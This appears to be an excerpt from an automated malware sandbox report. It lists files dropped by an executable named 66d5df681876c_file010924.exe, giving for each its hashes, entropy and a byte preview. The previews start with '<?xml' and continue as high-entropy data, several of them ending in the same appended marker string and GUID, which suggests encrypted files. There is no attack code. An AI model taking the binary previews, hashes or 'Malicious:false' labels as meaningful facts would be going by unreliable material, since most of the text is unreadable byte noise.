              Preview:<?xmln|......y.j.j.Z.r.).K!..?......}x-.l/.`R.R.V........h.I.$....,.+_Y.%.."*.TCa..7.t....*`n!....O.9a....%..[...*....._.M`n...B....C.o.Z=....sS8....6..r5...l&rF..:....._..q3...[..8..p.AH....?;..;.{.%b..)>y..m.......c.u..l....o.%.Bk.Hsc.5..c.Ey..../w.M.$K..)...e....{{.x.......K.HhA....(.......d.....&.o..J...J.....$..3..%.sfo..1.T5..?.e./@..>j...}Q.^.6......l.M......o....X,6b]....A.....5.+..I.E....Y...?...H..'..S...6.4..?)..!.Y.....K..EF4.\...;...h~...b.#.....B....f.........*....{..\y3(.a....Lm............e...6<.N..^.F.-.....E..{d.....Q./%.v.E.....n.%.X:G..yZ...q..3...4.e..<&.."Tk...]qP}....*..N.8.c])s.....#...y......f....,]..5.w...]nc5.'..M....p.;..J...7..y........G.!..P.......:ebX.=6(.....?.t.. ..&.Q.{.c...a..@h..aV]j.c..EJ............JS.....=....'.TS.,.tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):953
              Entropy (8bit):7.787899925445962
              Encrypted:false
              SSDEEP:24:rJ63kDqf1TsnWAYAw/Hvknu023B046P2L3X9R7BO12gHqUbD:rJ60UpsRUHvCu0A6OrX7UTK+D
              MD5:35901BEDDF525A94E086BB4EAB5F4273
              SHA1:628A57031327BBA06195BA19B2039CDB2ABDA8DB
              SHA-256:2B79B18AA79383638811FE59EB97CB0FD64026FA23B00CC8BF469EC1D8A74EEA
              SHA-512:5172BB8AE5F2869B7DF6F10D3E37900BFE50C345A0344E519490B539B8206C110DB8E2B45137BB7527F42FF96DDFD2D63D63C695E25706EFB901495D3DC1E340
              Malicious:false
              Preview:<?xml.4.q.93L@".^A.G.B6.rE/,_.q.q..:....r..xN...\.i..?.q.Lw/=.....R#*t_... .v..,".X.G........K)....../u..:0.[...gv8Bp/..3..DM .%.f.}h..H.(&...1.B:.QQ........2.s.L`..?.....-..c.?....o.....1.9hO......H..zD.Ja.3q.H.._...................N1.7j-..^_g.....?W5..+.'..r.]....d......p..a1k..R....S.}p.*.@.....WE..JM.9YMJ.*J.Z......(|..{.?tpP...G....+o.p......H......0..z.?WU......r.3.q..$^.vl.....H......h2B...gz2.....z........~N................*.... ..6%....AW{#.T|.b......W.e&._..E.:.#.Hv..5^.4...GX..]..j..p.P.7}...yO..Z...b.>Yn..S.~j.~s.Z.[.3..._~..z.r.n..[c.=,....L..|d..B.}.....y..`Q...7..X.....c..H]}....r....qk..wF/|.g.%....>1....K?!...b.6R.0..^..mS...Y.b....D.Sw.Jo.0\..'.T.[4E..%...]f..............".mj.1iO.!.....#Zv. o......'..=..^........a!&.E.L.|%/V.pCz..dz.F....].y....Y...N....q1K .l.F$.../..>BCV.....J.......r.......tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1139
              Entropy (8bit):7.837238359782603
              Encrypted:false
              SSDEEP:24:+OLOrl+rueCViBb3uZb6MOtpZTuytXcTizBbasnTACTbD:7q+rUViN3uZbfOHZTP0izNaYND
              MD5:C7689F4F66B5F69A75593DC0C216C015
              SHA1:4D2EF3ABBE92BA07BF1D86952A2C08C0EDA6C14A
              SHA-256:17700C8D4517580DA50D88E969105FA44E9701ECC16ADEFAA4F84BEB089C1039
              SHA-512:0880862F9F01941069CCC5A516F37A4119A84C318038FA58CACE0650F3C8D3F4071248A3599E41ECF1D587D42A27512C46DFF804A6698361F060165923D7FECC
              Malicious:false
              Preview:<?xmla.UP.uu.d....G:.S.O...q....:l.....Zgx.Sz.4..!.._.....&...z'...p............f..@.',C........>jj..q....E.%Zw.f>$.....="..p..kC..#Ub..0.iY8......uO.H..R..q-..F.}H7.S?X...-..)U..G...!.....4.+jP......jEI.........hu....3.lv..X.b.....i.....6,5...;.y.l.S.[ub_........m...)a..#?..s...L...O..?f/...~......._....=#...x...6..'.D..w.M{..m.....O.....H..a .........O..&o...N?.R.]..n...._..w..k..5....X0p9|..._.[.i.[p`....?vKw....?.POL\!....Q..O!..gH/h..._......[..RXu..>.....7.6..&..........(]eEq...B+F2..U..Y[..tZe<...Q5.,../c.t.dhu...9..5LBE..V..E.Sz..5h...i.W..{..m.%..h.*..h...r..j.d..........`W....d.?ssx.9..U.....|l.......U.;..v.MR......R....Cb...7.3............p..5.e. ....V;..u..[.}...MK..Q.n8.n.|.9e..%..g..r...6...,.J.Zl&..u....wd3..M...UEJuJ.w....g./..[..>_....A4^..G.;..-...?6pX=8.n......S.....NuJ.....d..;?q......i.@h...Vz.... .Y...}..._..k..y..~...3.F.".}z,.@@Q.z..m....lY...#6..d50Y.n_..J'.|^.+..G>...-...6M8su.+[..#.sa...C...KQ
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1678
              Entropy (8bit):7.8876976410112905
              Encrypted:false
              SSDEEP:48:KVHCur7uhd10oS1kEv+MWwAwd7SlE0Q5AD:KVHHH0Coap0Q6
              MD5:13305BAF1C1A73A6314B5880914A7851
              SHA1:E6AB63538FF8459C40461E8E320327FD4B4FFAC7
              SHA-256:58B154D306222A71F132C160D39DF756BDE3012BA59CFA1AD950844721E89B1D
              SHA-512:F91A4B6E2A02137C0409987F2E239DCD0B760A801846F43B092C1FCF5A656F125BA9C5FBAF10E73850249985748DF344E12D001A14F1D2AB8F0F3BE00C89C006
              Malicious:false
              Preview:<?xml..k.z.rb..@.Yvfrk......#...n.qP(.@i!A.....|.8..|...96:..T.`;(.<..'.........3..+....H.o...` c.uW.}uM..uW.....DO.-N..T..z..:[.{]..]....D..[.&..4..{..d.Kg..e...._..6.9!.z.[MXO.'..f..{E.."..."A$4.I..]...'..|.d..)..Qkr..'9.......7....G:.h.&.(..hSH52.i...z.3.X.lE.6.S.ZW..r....n..<\.;W.M4.....O~NK.......r*..I......d......$..x-x4..:...Y.<>.....g...pnXXmCzfBE..iD...(+M.H...An.....a......?....5CP...'`.(.{.c.....3P...o.]!D....G..Z... 6.Mf.TeY.*.$._.......fjb..H6...{.c.r...s..3Q...M.....:._..@n...;.e...%..&..N[..Uyz..9j..%..w...j.Y..{.4o..4UMw.`]#.....|:I.L...d.....Eo-m...&._=*`e... t`...J.)..q.I./.d|[......v..~O.zM.J.49..P.NOC".V~....m#..ZRm.m@0..JM.&<.t..X.A[.g....).|...q.%. ...Ljc..].G`..=.1Ez..ej].f-I..HF.bh.&@@.>7r............;....y....}..]ah.....T.....:....68.K.9"....#.0.`..%.32o......~iUZ......7.....N..nFE.."dd..f.<"3...!.....X+.Z.>....!.=;c.....v..$L..H([....R..<!Bh..DX..:!..mbM.......d.?K...['d.......R....k|.`..I......8.KT.y
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2075
              Entropy (8bit):7.906225480222253
              Encrypted:false
              SSDEEP:48:9Gm8wJMOTAAGJ42RzSodhDSNAlBYIWcSlIwGRcxOHYYCyD:92EMOZ2t9v7SNAlBYI7EI2tYCa
              MD5:9BA879B314382237ECC79BC5464EE94B
              SHA1:F02AF960741444517B5FD2E3DF86DB93752876E2
              SHA-256:FA3D662D273994434F0FD26189CC41C215FFDB22D97DB1641E4C6F93B1306864
              SHA-512:1F3C9276158810509AE373691CD89CD60906506E9BA9C7BF1A1ADE80BB69DC6AA2F3E472C582D360AD72F138373C9E8D6225F61BF94D30D67E04E1068DE8BA49
              Malicious:false
              Preview:<?xmla.0....)x...*......Q..P(;.'..O=..C.../.1..#|....Xp..1}....;{'..r...vCoc..AK.. .a.vW........Mr..Vkq.Gi..).H....d?......<..........h....N..<S.&.-......l9.2.,..:..D.."[.h........&sTx.I....e....QW.f.V......D...Ufx.y...}u.X$I-....T...h..N.f..6x.\.Hn...?.r...4.s.OI .Q....Kc..6u....j...:Sz.%..n.B...<.l.....(......r.h.>.F.;S.{.6..."..j..0.s...!ek.*USD.b..!.0X..v%.C.R.........f.=....S...........yi.<B.....'.... .S..=7.b.......e.p..j:...Z....m.i..eav..l..q........=.5..%..rUw..Ge...s...._.h.......*...^.Q.d...Yo.n....)6.R*.G.z..]*.......{..e..lb....<..p....7.BJ."....e.'}.4E..x.............EV....7!...G..!:f.q....`...'!U".|O..6.........IV......{s.RG._.k..k...2(..:...y^'.G..V".....7....,...I{,........:Q..#.5.[..7/.+=]. .AQ.P...@.';c#.X..8E..:q.. .Ug2y.(L.4..9....@..W..2K1&e.u.)..L..u......p.Qo...."}k..n.j...G..'..0...X..........<V.L3....;.......[.(.\L.Q..:.....l...Y{.!......4".bf$m.CX...9.:............./$^x.....iq4v"G._z.R.../..>..B..zX.8..Ub....%.]..=.
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2088
              Entropy (8bit):7.915762034701039
              Encrypted:false
              SSDEEP:48:xGIf61U7avqYTZTdfbMlVfmXHTlGsb8I9II35cy6wHa04v5D:xKe74qEBdMvfC4sb8KIe5cTAa0S
              MD5:5B4B51A094762D952879A9E70F36115E
              SHA1:71060C6C79FE52696695202B6F7972D9C1C62A5B
              SHA-256:390A9DE38AF6512083FCAB6272F2D7845A1F75692CD2A79C9C14A140EFB0F4DF
              SHA-512:43861C47457D22F2CFC3F04EF2EFB0D123E9442F3AA7CED7381E9490142E786A0892CE453B0FBC72F8C93B966E13086D7B1B7E78AAF5F686947ABC4944824446
              Malicious:false
              Preview:<?xml7@Yq.i.G...6%.....&s.....oAS....4...l.........@.]@..._\Tb..\H..R..h..m.U.o.....j.~.fS..c.hZ.d....I1.....D...5......B.N..<.{7........u...IC.M.5#......r......>...j....j..<...l..?..L....e...p.:.eIP.=.....t..^.Q..< .$.....f.......OR....T#.x.uWe.X...2.@. .8....@?..._....K5.....X.F..\LW..c....P..hs....O..U.....:zPE.m.Y.....tS....c.....t..G.v.T#...Q........M`.j.O.]..p.C+1.#....K#.S#;.4...v....R..#....mn..~.I"...9&...N`......h...U.5.....^..B...t..Rs.K.Z.).._.....-..{....8AY-.|....kj..Ri..._Q..../..1W....R..k0.M.m.9..n.....".....Epq%......`.......j...e_[.f`...E4E........M...<.m.lB...O-.U*....B..\+.'...%..w+.tJCH.#.k.%./.]6..z....r..........>..d.L............#l]a..O.\<...W(`..\..L...-.Q.}...s/kC......0~..E.b...N....."D...@...Ky=......w.@.#.......$.../#...=.~....V.B..QK...F.pX.p8.....b.?s..._ .&oV....&.~.F..7.......~:.pH...|(T.F.....h.....b).0/.p=..X`....Y....6C....5p..p..-q.g@..2u1...M....<*..A.....q..A....C.....u......L.}\..8.}.s.zV..,$..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1563
              Entropy (8bit):7.854248984520384
              Encrypted:false
              SSDEEP:24:wQI/2iudMAcMs24FgiSpEb75CBTJxmH/q10cIcIIyynoiPuuaoTMkWHXIbD:RDmABXXiImwJx1uctWyo0P2HiD
              MD5:766D068FD196C0AA7794B7C9F3DC53DC
              SHA1:5BC19E9B5BC0B32CFA62B8E9596A56661CE841ED
              SHA-256:F02D4FF512FDBB073C71EA674557D13B33C98BBD35C586CDE037AB05DE339C30
              SHA-512:E18A2A64758EE46FEB149D7BFFA85783E2263FEA412BB4FB3BACA484AB9B12D89230F49BD87AE458E5E69985043892F4635484CFDB211A96C7ADEA6794ED4B40
              Malicious:false
              Preview:<?xml..q.t.c.QK..MV!.R...b#....$x-h....."r/..5KP....W.|qpwFc...4(.J|.y .......:..`..x.{...w+.6.>G4....e...v3H.@f....a....._O.N.Q..L2.T..X.H..8'.x.....-1I.ffl.H!...)/.......A.....y...;.!..l.%g...3g...!..v....C....$+@(........W..]...0 ..&~o".e7...3..m.*....^.hO..+.E.q........k..%...!.O......j...f'.n..1.S.u..e0U.w..0.d..?[:g..%.]jR....0DFcI`@".+.]...,...|........-T.........._.e.H.j}.sQ.sA..fS..6]......A....CKL....71K..26"v.Gt..W}..}............~..8.(..;{."....J.rq.D...Z...b..;,...R..7.R.Y.B.../.Dq.Ft..n.....i...D|.J.....2.W.D ...6X.L..".`...t.M...;M..x...>h..T.W\.G.t...S.1L.*.]....)..m...Z.._......8......(F...H.....$~D~X.Q.OC.>.*....L]..k!..X...:.....[....A.. .W..f.4"r.kc6..kA..q.M.L....b...."C....X....zh..;..........-...)h.#...x8.&.;..J......P].)f>..[..{IJ..8....oW...T.s.I.....3.#.......H..._....\I.k...# (.....$......H.J......s.~0...........~.x.].Hd.NQ|x`d...zA....:/7.$.x..~.(e.")...T...x....>.[...<3..4.R.J....C...2[ (...[...r.+.g...v..t.-
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):777
              Entropy (8bit):7.736878478706132
              Encrypted:false
              SSDEEP:24:Npc3RZJAa6N1L06cqNhAJx243Q3NxdiMRbD:Npc3ya6N1L0qhAK48NPD
              MD5:789B3247478E85FD8EB0F450B9271830
              SHA1:547F208B39136AE5080F2B490CE9102D0DF88FFE
              SHA-256:819A1478B21FEBA38E5DCE07D2A137B3D8F93A5B79CAAC0D9ECF86A05C0C3910
              SHA-512:5E2329F54F4E50B700928BAB989A7060F701FBD91A88656880FBE7A3AF40824AC773A8F661BC05AE53E65F55D4A61AE51F265F9EBFF063DD49623BAC7CAF98DA
              Malicious:false
              Preview:.<?O.`s.).....~...k.K..I...X.!W...6.8.D.<..(;N!..9RF(.XS,\...j.+h&..@.-.V.M......[.....J....+.-......].Z8..%N...r..;Z....;3....Gao.F@j..A..f.II..@.c.../..jN..H8ApS....$..$.....6.......l.W.......h.\T.<..{.J....w...QN....9.k.....bE\@..ac..#[=..#?.J.i....&.\..,zL...tw=v....o.U".5W........t.PE}...p2..S8o.h..o.\...eO...W../*.........<.v.E.b..cmX..z.Z.......J...s..[.....}.[...<D@.N.......1'.UI.../.^.DY..U.....O..E.X........8..`...jbB....`.w...tC.g..(......:.nr...[................9....kg.r......R.......a.8..b..u..^.v.O....z...T..B......]$a..B&_h..2.....`o....n.......MU.}...........[.}U.|W .M.{\.._'.N;...3r..7......b..*H..F......+A.'N\G.X...j....DAnRtp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2618
              Entropy (8bit):7.93137439165454
              Encrypted:false
              SSDEEP:48:Ak9O3kSbkAg9/R6w8syiI3cwB51RfETezF+ApKipz6miV6GD4QGBWkvD:5ikDb9+LB51RfETegAptzE6hjWk7
              MD5:E12AE010AAB0B87FA0422CF4C76CD3B6
              SHA1:C85E55F73630168BC733D5396CE67D3F3285E6AD
              SHA-256:5EF6DD21EE72B0C4A35C7827DAFADEC13FFFFCAC76F5F90DE05B5B3A6C219D4F
              SHA-512:C993DE27C2742273E59D09BCBABAFE107438FCCDE04796A7C402D2920C7380D527FED74D00F399924F51178050782A620B29C6DCC043E819D644BB5A0421566C
              Malicious:false
              Preview:.<?.a*.6.$.....G........r...3.t...;.6.4..f.$sx.*i..G..Mv......5...B*x.G...B.C.y.d..U...=.+~....r.w.2..n.....>zw......*a....S..'u/........5.E.`5\..p/h...g..?U......{_...z.Aw..>.Wv...^z.. Cm..0.0..?....ZLMh.....aj.K...gz.<G..`4SO.$...bu.....w>....SNM$...;.&.c.{.....N ..N...>m..}._.h....}vT...i..|.-.%..v....G..~.gf2*..Y..}9...s.e....LDRp).4...!.B...Z ...=e/.R......x..{osZ...>..i...,l..(...y.|OD|.1B.z.>...E..../.x ...Gk......K..$Y..Ja@..n..v.z.o.q..+.ao...Xwe.`....:..n..r....{...~...T.7.#....3......j..w$........T....U.c.......+I.*Rgf~....n..i.....&.D...-H<d.....R..y..n.FQu...al.v.d.W)....z.n.....U..2.!..u.....)..q..i.-.2.....P.4#9..G.(oElq..b....z......+.q...*.U...k..9.6... H.........x.z.u..#n....!D*v......u|3H.)7.d..Ay.t+.e8.......!9.A#.+<V5.7h..O<...8.d<..U...F..GC..,..i..KS.....2?....qZ..s).k_... pq6..AW..].`...,.n..0.6...a..b.....\..:.l.c...E!..I..O..mg.....R...U`>.F.V(..hUE.U....0.v.._<..k*...(B.~..L$..M.b..@..I........5..7
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):784
              Entropy (8bit):7.664763518600835
              Encrypted:false
              SSDEEP:12:UfaEK9N8O3G+Pxqxu4Q7khI7Jeu0UXnGN6fVPA7uKdukIcii9a:9nnxWRQ4VQW4tYaKabD
              MD5:81AEC4CFD2680696CB07B83B899BCCFB
              SHA1:904A898C127BAADD1FEFD2CDF735196E9DDDA03D
              SHA-256:743E5268C6E7DF4F87B1B6A39DF2988813FFF37AD36FEAEAB0AA966F2C863C66
              SHA-512:5AC577B6CFE15AB77EBA63A17E391BD9B4AD5BAC0140B5F7BAECCDFD2FFCC8A053124CE4309DBE97F3A7ADF9D9EFCA573C006C8BA853BD2A02A762967D87B0AA
              Malicious:false
              Preview:.<??.nEk...oo.c...*P.A;. '}I..D.6.sw2..[....Z.Y..T]i....}m$a..W..e...;b.(]..F.K..j._...'t....f._..tu.h.x.}.aVm..e..r.......7wGD.,......M..23..h...>.?A..fKW.D.....B L...)3[,..C....j.k..s.'o Z`..N.@...U.........qD..5..E.q..\..AgkC.n..../...6p.i>qrb....lK.....%...(qb-v!.p..^.2.|..]#4m".i..m.g.C..s&.)w..`..a..1..Cys}...DRi.9.NDG...^.7.k2/y#mP..&......[.fRn"...b...m?.fKu.`.n.Ts....F 7..B..#W.x3.RM.....Gd.@ys.Y..._...3..J8..y...7..HO1w....]B...t...:.i...+.....j..I..h.A.H.Mz......B_.......F.......#W.. .!l.G2.{.s..,.P.......J?.j..7.y#0.k.0.c.;.W.`ef74./..v.xQ......OU.c.86.q.....'w@-.....*..Gz..x...h.k.LJ...4....9..Tu.....%.....y...X.W3?.w:H.L.Y...y{..WyU.M....J.K.!....Gh3.@G#tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):3148
              Entropy (8bit):7.946440189747027
              Encrypted:false
              SSDEEP:96:EoI2CBfNDGyLpt+mYlKl2bHH/ROxF+pinH:KB1DGy7+mYlKMbHH/ROxSk
              MD5:45CCE400FF2606B666EE95051DBF7D86
              SHA1:583672158844E61439D2362886CDA7923675A98A
              SHA-256:3E592D5F053CEC8792323267BFDA869D79290899E86CF12EFD019F984345314E
              SHA-512:E717DF7F4B552B2282BB8C0DDAB48E7595C71DE99220BB8686687F5CFC3C0E8069DA328E508F435B5D5B4AB78A9C843838413D59B69094C1B43CEBF374808C74
              Malicious:false
              Preview:.<?....$.....*....R.t..h...X:.w..U.p..+|.GJo...?R..Y$.^*...x.>.e.j.Q1T.nR..MP.....>..QE......^.|...g{....G.ic.|u .f..+..e.u.Y...........A........_.T.xc..Y%.[....9J~.....^..4im3..^.......wb...htxm..Ek!q...B+......t...H...m..|.AR......&=,.].XMG3u.?.wNg...A..[K...8.[....4...'WSyj..B...S......#................3*.z....9.2...0@.G3.4...#^..J.%.gj_+..9.K.$.U...0>)x.&j"3.z..4.E3!........&t".=U..2,.L...y..7..y8...N.@.<.%.n)....^.3.:.z..;tP;._..}Sy...p..KM..|...V....G%..~.6;!....).g+."U.Q..{.Xq...P`..\..<X..f)....R.,.....9...{.;.....x.1=._..2....l......E...Z....N..)T.......*.........*.&.^.b....O..t.X~..?..l(+.Un..R..^s..k.92..=a..eU.~..Ua....~#...Ii.e%FE..pS...A.x".9.c..`._=..c......`2.MS.......{.'Pb..1..}.B.W..e....+Wn.p....'.............._.'T..0!.P......f ... ..f...V...t.Z....v...Cj .:..)..7... .w.R.Un|.F..WD........'.....3:....w...K8..x...y.....^.!.......t%.Ee..A...$.<.....>O...^U...H...8c.3..0>s.B..N`....8H.Veq....ZF...gq.0........4...4..
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2238
              Entropy (8bit):7.929448490519947
              Encrypted:false
              SSDEEP:48:nillX1u8/1rpTUvkYnHHIJYu7SHdpI/GWhbVu5usJxL45uD:ni70+TUHBrdpIeWh5u51KW
              MD5:CBC6990843E80DCDAEA5D1798B942272
              SHA1:9DE1A86F1213D8ACD040E4FC442821093D81EC42
              SHA-256:CACBB19AB70D0EFFBB9256999EF2509FFCDE66FA7BBF5E8CDC7A3D8079941D2A
              SHA-512:1F7B7723BF5E766E64B5D798D19A2C931662C469C1C1107F6F6A5A6CAC8865C8FDF45191E3C7BF0AF5C43AED9C36F4B6B7BB1598818814CBFCEB93329E613F55
              Malicious:false
              Preview:.<?..T}x..Pk.u/.........{..~.[N.Z...H.C`.+.6...AkX.t.W.>.).N....f.sc..$.>....K.{.!G.y........CY..!....W.V......%.qS.2...E.:.Uq.\.;.....qX....7...Da*.X.z.v9.q..).H.~c.9...cXd..0........7.....{;.....V7..)s=..q..d..J..qZ..Uy....R|Cg...R....UD.mn.e'v.^Z.&.b..v(k.l...[....=...=.Zc@.\xO7.;.zO..5..1.nH.-..h.+.."Y2el.0!g.f.}..xiG..C..%....d.A..9.D...y....0f..,_/.Jb+j!n|6.*..4D.....=.....C..R.ns}..].x?.^....m.c....M...`M.'.kRE:......B^........k1..;m...n*.....Ix\.We.er...d.+tQ.M.S!!)..vk3a. ..p..t..."....b2...S......'......Z..=.......-p...G).4...U.v.......1...h...DDk.q;75.<Hw..r.~..bk.IccB9...R....*..f,.U....s0U..p.....2...x.IY..Y.v..2!...5..-.&w7.4R_.f<....* ..%.n.2..c.f.9.]p...s...2|...wQ...=3a..."............Bn.....5....:g...1..t0..6.`..4m:....^....u..~.u&....66Ce./.MJ..w..j^e..Z!.......h:Z...an.E...Q......{......v....Lh..]^,.9r.7}.7.$.K..6#..I....y..2.|.?.^+....M.Q....[.?_N.I...b.S.O.F....!..M...v.b..rD.k......'M`....H..K'h !...I...D
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1925
              Entropy (8bit):7.898896144775091
              Encrypted:false
              SSDEEP:48:tnKgUDiVxyu9H7M1rE8FLSWbLfl7jVf5ZUH9qpVD:tKqVDOE8nzl9f5SHOt
              MD5:0AE1923FA932DE3E4EB07CE1450ACF86
              SHA1:7CAC3DF49CBBB0650C378575858A035235DCF13C
              SHA-256:7C6CDDF1C5FE338D756496C3E4F5A604F0832E03AD2D148B5CD85ADA335F10C3
              SHA-512:B5DEBAB5C8CCBA4C6F5B92F9593046A0F1BC2C61AB8F13A425555F3F4C65FB108815714812C9EA3CB0206CCF6AC47D5C5ECCE19D7CF7A41796038E627A46049D
              Malicious:false
              Preview:.<?..f..J..o..>N.g.j..:...t.GH...#.....(b47.6._..`.TU....q.ZS...<j...../-o...].T%......v...'.....P....h..J[...OP...Q...G;.............lm.P.fZC..`...K.Y...}.32.za..1-K+...<;..D..K...6.vHo.g......p.f.k...g|$..j....4l..j*.h4.....E.A.....>QE.O1.b.J.[.g.0...[.e..=.?.FGJ.v(..XsR.j)...cR.......aQ.}....?.G9.d:...6@.:.jqlx....e=W|.Y.6K...`;....i..HB9...$.e7$..R....q.s.*x..).5].;..h..$..R.q.<.xQ!s...}.<|.C..:,T.... .....+.+.H.D.......P..R.U..dh......CnA...`G.!.:U.j[.D..mZ...W..F.Ai.*W]...I....~..s..c|....Z..RY..u.k.%..?h.S....R...\...J.[.D........[|Ya.yy.-"..8]Mv....9..y...4...=...X..mO...<;..&........c..`{r5.97.r.H...I.J@..L..p.X....q6-.}f..K}.3........U.]c#.....m.6.....7Q.dLe...:..gBpC.L..?..QZ.....f.../."..*8.j\..w......C`.......o>...g.$My...SW..y.N...Rw'....:&.M.J6..S.].B>*_o......1..W.0..Y.].......z.U.W.C.}vH..CT.s.-.h...V....&.W.,Z..7....utc.s1..!.,...;Q.l.^......Q7h.=.C'..Ag.[...d.uX......it.]....w.c....&$k..T.Y{ Y&q..Ob"[..i....
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):911
              Entropy (8bit):7.769416798039119
              Encrypted:false
              SSDEEP:24:out8JDx6ACp1SuwzBPrpoGK8Vq0ML4+W0v2bD:ok8JQAq1SzPrGGpV7MLZcD
              MD5:DD4300EBCEBC47BDE5C55F7D87195EEF
              SHA1:832400BC2380DFB2182389B88F3E38BFAD7D9432
              SHA-256:A38C294724AB8299719AF40D09E36D06928A96F0DE9AACD84C4027EC5C8DDB56
              SHA-512:3C4AAD49E37C12F4C578DFF29862D83AB69B592065F6E62CCCBD8F5281A2DC384C122A2A515ED78ACE536C817BE1F433C2F0EE548D961B3B022849867AA61854
              Malicious:false
              Preview:<?xml......5....#..O.......\...E..A....b{.4.....q...{....=.....@>.."6.R5...K#.H6..n..)......MF.F....Z.]L"...!...f2)..+.xI.+y.........6,< .(J.....1..v.....fV...6..N.z?q+.'{........%......L.M@..HSs... S.KI....0....fHe.gY.}f..![...~.X..KU&{...0.G<.U.`z3.<Yo.zX>(+AEs>.tY...].Q8..e5D....6.Iz..q.Du..)0."i....i..z.f.k......@.$...S.N3...V.Q.kU....A..K.I.I=u6.[..Q..w..,...Vp.,"...Q....]........>X}].......%.!....r..7.$.7.O...Bq.(.?Kw>..e.._u.. .3FOgQ.e....il{}...pb5......k.&..'...L).6q.....!.]....(.N....x......cu.W`.oHd...U..Tn..$D.x...(.B....n..q,"f%.#iy..p...u.5./..'..~..JA10.m..T....|.biL.*5@&f.&...`..2...j....q.^..."/D.j....$...J.8...d..Z5./......b%.!...+E...w.-..DB,1...i...D..M.<!a.l........4|.....)7....%.FK.PB.4.V../(.IN...k...Q<.[Y.}(.K...Y...wJ._...r......ws.z.ox...K".)tp8qj68iQwedJUixDcnQEpfFZzicxmbmmdy7tJyT{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):2021
              Entropy (8bit):7.902163816936223
              Encrypted:false
              SSDEEP:48:Ml2hJW1ecVLgmGvM6gtGVZjmkYB1ej+FibHqnFnD:QWiTExqkMAaFibHqnZ
              MD5:D3C658E3079995F3DD40A916F5849307
              SHA1:35BE61491A025AB420B42209D0E8E312868E0484
              SHA-256:030895D598B729BF47D865855BFCAAC098E233D41DAD8355E83ACCD3A9118AB6
              SHA-512:8C899C84B631BC0A233A42E096ED91E62DDBEC6DB3D227473B202CAEF27440AA81338792F2BF98D42EEF18DE22538F503A17225D5ADBC5D9411A9C66A9D39370
              Malicious:false
              Preview:.<?.....+..Y.}.]/...R...s.......*j....>.m...D...U.9........6.[..%.t9.cBz>....Hu..2_%.{..HsG.J..&D;Y8Q'pT+7..I)]7...~%i..*...h..xRkn?...T.....rj.!.y..IL..(g0.n.m.....9sj..V..'. ..*.M....5...Qx..D}w...."...QR.&P.g..I'..*..n...H..Q.~..Q..jKcV..S.t.y.s...E.4Qy....hV.$.].Z.c.:.tRM~.I6..|o1.;../.q...e.-......&.{\..q..Xa.t.e.CN..d......onH.q...@\M.w...qq..%'..:...|.......Q..."a.*..!..q.....9i.{T\(..$......=j...{@..f...?.k...7.......h..8.k...<.|.I..Dbf...%>.7....([O....d.u&...#X~!.."..._DKe../Fh.0c^..-.K.[..]"...8............. .T.fU.0...I..eRG...........5?^..W....<....lK....j.....v:(.d..G...>'.=x.Xt.W.v..[....g......tz.....;....5...l...W.........._....B.O..$=:.F.0.i...|.Hq.)Kz..5J}pg..>..-=.K(.Y...h.MZ+..O.B..TR.NYs.*.....Ed..|-...l"..6U..u....s.X....?/...C.=<TL\.s.p...C.g...?=l....[..B.2....Q..:[W..I..$.z.@kO!.'....9)........*,...c...*..D....X.;.8...3B.."..=_..|Cl.mM.?X....k....S8E.J..:.....=8..4E..5.k.)...~.ns..`.....}..J.p......yD......
              Process:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              File Type:data
              Category:dropped
              Size (bytes):1187
              Entropy (8bit):7.809402006515882
              Encrypted:false
              SSDEEP:24:ih+wDnVtz+Mw31C3fxHFiq9Rm4664GIFExga2kYUduqpOwOWfVJbD:iowhq3wfdrmvgIFSg1kM3WfVpD
              MD5:57AE6DA76456EC5B51E3608063FE2E2E
              SHA1:17885071379780AE68192CEC74E5FBD9D4F459E0
              SHA-256:6E2CDF8F2A29D20EE09BE092576EBE1E215A0461300D2E0998B7087886E76998
              SHA-512:0D7A1F8861DFC38B906CE68EFED9A76F801A42FC25AA6AC41FC4172C7F0DCABE949C8E67E499742F87EE68CE1E879BF11EB7FCBE532B202C8C6ED879E3E77C1B
              Malicious:false
